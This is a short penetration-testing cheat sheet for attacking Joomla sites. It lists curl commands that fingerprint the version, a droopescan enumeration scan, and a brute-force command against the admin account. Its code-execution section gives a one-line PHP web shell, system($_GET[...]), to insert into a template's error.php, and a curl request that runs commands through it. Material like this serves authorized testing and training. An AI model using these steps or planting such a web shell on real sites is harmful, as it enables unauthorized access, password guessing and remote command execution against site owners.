Joomla
Footprinting
# Confirm that site is running Joomla
curl -s <http://site.local/> | grep Joomla
# Fingerprint joomla version
curl -s <http://site.local/README.txt> | head -n 5
curl -s <http://site.local/administrator/manifests/files/joomla.xml> | xmllint --format -
# cache.xml can give us approximate version, it is located at plugins/system/cache/cache.xml.
Enumeration
# Droopescan installation
sudo pip3 install droopescan
# Normal scan
droopescan scan joomla --url <http://site.local/>
# Brute Forcing password
# joomla-brute
# LNK : <https://github.com/ajnik/joomla-bruteforce>
sudo python3 joomla-brute.py -u <http://site.local> -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
Attacking Joomla
Code Execution
# Php code to include in error.php page to get code execution
# 'cmd' md5 encoded - dcfdd5e021a869fcc6dfaef8bf31377e
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
# Using curl to execute commands
curl -s http:/site.local/templates/protostar/error.php/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
Last updated